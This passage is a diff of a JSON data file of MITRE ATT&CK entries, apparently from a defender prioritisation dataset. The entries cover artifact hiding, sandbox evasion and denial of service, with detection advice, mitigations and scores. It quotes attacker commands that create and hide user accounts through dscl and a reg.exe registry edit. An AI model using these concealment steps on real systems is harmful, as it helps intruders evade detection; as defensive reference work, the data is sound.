+                "detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1564.005",
+                "name": "Hide Artifacts: Hidden File System",
+                "url": "https://attack.mitre.org/techniques/T1564/005",
+                "description": "Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)\n\nAdversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)",
+                "detection": "Detecting the use of a hidden file system may be exceptionally difficult depending on the implementation. Emphasis may be placed on detecting related aspects of the adversary lifecycle, such as how malware interacts with the hidden file system or how a hidden file system is loaded. Consider looking for anomalous interactions with the Registry or with a particular file on disk. Likewise, if the hidden file system is loaded on boot from reserved disk space, consider shifting focus to detecting [Bootkit](https://attack.mitre.org/techniques/T1542/003) activity.",
+                "mitigations": []
+            },
+            {
+                "tid": "T1564.006",
+                "name": "Hide Artifacts: Run Virtual Instance",
+                "url": "https://attack.mitre.org/techniques/T1564/006",
+                "description": "Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)\n\nAdversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)",
+                "detection": "Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring the size of virtual machines running on the system. Adversaries may create virtual images which are smaller than those of typical virtual machines.(Citation: Shadowbunny VM Defense Evasion) Network adapter information may also be helpful in detecting the use of virtual instances.\n\nConsider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a silent installation may be especially suspect (ex. -silent, -ignore-reboot), as well as those associated with running a headless (in the background with no UI) virtual instance (ex. VBoxManage startvm $VM --type headless).(Citation: Shadowbunny VM Defense Evasion) Similarly, monitoring command line arguments which suppress notifications may highlight potentially malicious activity (ex. VBoxManage.exe setextradata global GUI/SuppressMessages \"all\").\n\nMonitor for commands which enable hypervisors such as Hyper-V.  If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. \n\nBenign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1564.007",
+                "name": "Hide Artifacts: VBA Stomping",
+                "url": "https://attack.mitre.org/techniques/T1564/007",
+                "description": "Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)\n\nMS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)\n\nAn adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the _VBA_PROJECT stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)",
+                "detection": "Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)\n\nIf the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    }
+                ]
+            },
+            {
+                "tid": "T1564.008",
+                "name": "Hide Artifacts: Email Hiding Rules",
+                "url": "https://attack.mitre.org/techniques/T1564/008",
+                "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)",
+                "detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    }
+                ]
+            },
+            {
+                "tid": "T1564.009",
+                "name": "Hide Artifacts: Resource Forking",
+                "url": "https://attack.mitre.org/techniques/T1564/009",
+                "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)",
+                "detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ",
+                "mitigations": [
+                    {
+                        "mid": "M1013",
+                        "name": "Application Developer Guidance",
+                        "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
+                        "url": "https://attack.mitre.org/mitigations/M1013"
+                    }
+                ]
+            }
+        ],
         "mitigations": [],
-        "cumulative_score": 0.07410567380952382,
-        "adjusted_score": 0.07410567380952382,
+        "cumulative_score": 0.8700461114285714,
+        "adjusted_score": 0.8700461114285714,
         "has_car": false,
         "has_sigma": true,
         "has_es_siem": true,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": true,
-        "network_coverage": true,
+        "network_coverage": false,
         "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": true,
         "actionability_score": {
-            "combined_score": 0.023809523809523808,
-            "detection_score": 0.05
+            "combined_score": 0.07142857142857142,
+            "detection_score": 0.15
         },
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.00029615
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.69861754
     },
     {
-        "tid": "T1497",
-        "name": "Virtualization/Sandbox Evasion",
-        "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.(Citation: Unit 42 Pirpi July 2015)\n\n",
-        "url": "https://attack.mitre.org/techniques/T1497",
+        "tid": "T1564.001",
+        "name": "Hide Artifacts: Hidden Files and Directories",
+        "description": "Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (dir /a for Windows and ls –a for Linux and macOS).\n\nOn Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.\n\nFiles on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.\n\nAdversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.",
+        "url": "https://attack.mitre.org/techniques/T1564/001",
         "tactics": [
-            "Defense Evasion",
-            "Discovery"
+            "Defense Evasion"
         ],
-        "detection": "Virtualization, sandbox, user activity, and related discovery techniques will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
+        "detection": "Monitor the file system and shell commands for files being created with a leading \".\" and the Windows command-line use of attrib.exe to add the hidden attribute.",
         "platforms": [
             "Linux",
             "Windows",
-            "macOS"
-        ],
-        "data_sources": [
-            "Command: Command Execution",
-            "Process: OS API Execution",
-            "Process: Process Creation"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1497.001",
-                "name": "Virtualization/Sandbox Evasion: System Checks",
-                "url": "https://attack.mitre.org/techniques/T1497/001",
-                "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks  into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.(Citation: McAfee Virtual Jan 2017) In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)",
-                "detection": "Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.",
-                "mitigations": []
-            },
-            {
-                "tid": "T1497.002",
-                "name": "Virtualization/Sandbox Evasion: User Activity Based Checks",
-                "url": "https://attack.mitre.org/techniques/T1497/002",
-                "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks (Citation: Sans Virtual Jan 2016) , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro (Citation: Unit 42 Sofacy Nov 2018) or waiting for a user to double click on an embedded image to activate.(Citation: FireEye FIN7 April 2017) ",
-                "detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
-                "mitigations": []
-            },
-            {
-                "tid": "T1497.003",
-                "name": "Virtualization/Sandbox Evasion: Time Based Evasion",
-                "url": "https://attack.mitre.org/techniques/T1497/003",
-                "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny.(Citation: Deloitte Environment Awareness)\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks)",
-                "detection": "Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
-                "mitigations": []
-            }
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Metadata",
+            "Process: Process Creation"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
+        "subtechniques": [],
         "mitigations": [],
-        "cumulative_score": 0.44258250952380956,
-        "adjusted_score": 0.44258250952380956,
+        "cumulative_score": 0.11904761904761905,
+        "adjusted_score": 0.11904761904761905,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": true,
         "network_coverage": false,
-        "file_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {
-            "combined_score": 0.009523809523809523,
-            "detection_score": 0.02
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.3330587
+        "hardware_coverage": false
     },
     {
-        "tid": "T1498",
-        "name": "Network Denial of Service",
-        "description": "Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)\n\nA Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).\n\nTo perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.\n\nAdversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.\n\nFor DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).",
-        "url": "https://attack.mitre.org/techniques/T1498",
+        "tid": "T1564.002",
+        "name": "Hide Artifacts: Hidden Users",
+        "description": "Adversaries may use hidden users to mask the presence of user accounts they create or modify. Normal users may want to hide users when there are many users accounts on a given system or want to keep an account hidden from the other users on the system.\n\nIn macOS, every user account has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen. When using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 (ex: sudo dscl . -create /Users/username UniqueID 401) and enabling this property (setting it to Yes), an adversary can conceal user accounts. (Citation: Cybereason OSX Pirrit)\n\nIn Windows, adversaries may hide user accounts via settings in the Registry. For example, an adversary may add a value to the Windows Registry (via [Reg](https://attack.mitre.org/software/S0075) or other means) that will hide the user “test” from the Windows login screen: reg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList' /v test /t REG_DWORD /d 0 /f.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)",
+        "url": "https://attack.mitre.org/techniques/T1564/002",
         "tactics": [
-            "Impact"
+            "Defense Evasion"
         ],
-        "detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+        "detection": "This technique prevents a user from showing up at the log in screen, but all of the other signs of the user may still exist. For example, \"hidden\" users may still get a home directory and will appear in the authentication logs.\n\nMonitor processes and command-line events for actions that could be taken to add a new user and subsequently hide it from login screens. Monitor Registry events for modifications to the HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccountsUserList key.",
         "platforms": [
-            "Azure AD",
-            "Containers",
-            "Google Workspace",
-            "IaaS",
-            "Linux",
-            "Office 365",
-            "SaaS",
             "Windows",
             "macOS"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Flow",
-            "Sensor Health: Host Status"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1498.001",
-                "name": "Network Denial of Service: Direct Network Flood",
-                "url": "https://attack.mitre.org/techniques/T1498/001",
-                "description": "Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.\n\nBotnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)",
-                "detection": "Detection of a network flood can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
-            },
-            {
-                "tid": "T1498.002",
-                "name": "Network Denial of Service: Reflection Amplification",
-                "url": "https://attack.mitre.org/techniques/T1498/002",
-                "description": "Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)\n\nReflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)",
-                "detection": "Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
-                "mitigations": [
-                    {
-                        "mid": "M1037",
-                        "name": "Filter Network Traffic",
-                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                        "url": "https://attack.mitre.org/mitigations/M1037"
-                    }
-                ]
-            }
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "User Account: User Account Creation",
+            "User Account: User Account Metadata",
+            "Windows Registry: Windows Registry Key Modification"
         ],
+        "is_subtechnique": true,
+        "supertechnique": "T1564",
+        "subtechniques": [],
         "mitigations": [
             {
-                "mid": "M1037",
-                "name": "Filter Network Traffic",
-                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
-                "url": "https://attack.mitre.org/mitigations/M1037"
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
             }
         ],
-        "cumulative_score": 0.1738095238095238,
-        "adjusted_score": 0.1738095238095238,
+        "cumulative_score": 0.16666666666666669,
+        "adjusted_score": 0.16666666666666669,
         "has_car": false,
-        "has_sigma": false,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [
-            "7.6"
+            "4.1",
+            "18.3",
+            "18.5"
         ],
         "nist_controls": [
-            "AC-3",
-            "AC-4",
-            "CA-7",
             "CM-6",
             "CM-7",
